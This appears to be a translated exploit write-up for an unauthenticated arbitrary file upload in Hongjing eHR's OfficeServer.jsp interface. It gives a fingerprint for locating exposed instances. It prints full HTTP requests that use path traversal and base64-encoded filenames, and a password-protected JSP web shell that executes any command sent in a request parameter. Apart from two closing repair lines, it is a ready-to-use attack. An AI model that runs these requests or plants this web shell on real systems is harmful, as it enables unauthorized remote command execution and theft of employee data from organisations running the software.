Hongjing eHR Arbitrary File Upload Vulnerability
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
Hongjing eHR human resource management software is a software that integrates human resource management and digital applications to meet the needs of dynamic, collaborative, process-oriented, and strategic.
2. Vulnerability overview
There is an arbitrary file upload vulnerability in the Hongjing eHR OfficeServer.jsp interface. Unauthenticated remote attackers can use this vulnerability to upload arbitrary files, which can eventually cause the server to crash.
3. Reproduction environment
Intergraph fingerprint: app.name="Hongjing HCM"
4. Vulnerability recurrence
PoC
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Connection: close
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cNjYuanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%out.println("test");%>
The FILETYPE field in the request body is the uploaded file name encrypted by base64
try to upload
verify
Dragon POC
exploit
Write a jsp script with command echo
<% if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){
out.println(new String(b)); } out.print("</pre>"); } %>
upload
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Connection: close
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cODguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<% if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){
out.println(new String(b)); } out.print("</pre>"); } %>
command execution
5. Repair suggestions
Close Internet exposure or set interface access permissions
Upgrade to a secure version